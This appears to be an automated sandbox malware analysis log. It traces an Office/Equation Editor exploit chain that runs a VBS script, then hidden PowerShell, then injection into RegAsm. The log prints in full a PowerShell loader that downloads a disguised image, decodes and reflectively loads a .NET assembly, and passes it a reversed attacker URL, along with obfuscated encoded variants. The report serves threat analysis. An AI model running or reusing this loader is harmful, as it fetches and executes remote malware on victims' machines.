?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: xnHel.LNK.0.drLNK file: ..\..\..\..\..\Desktop\xnHel.rtf
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
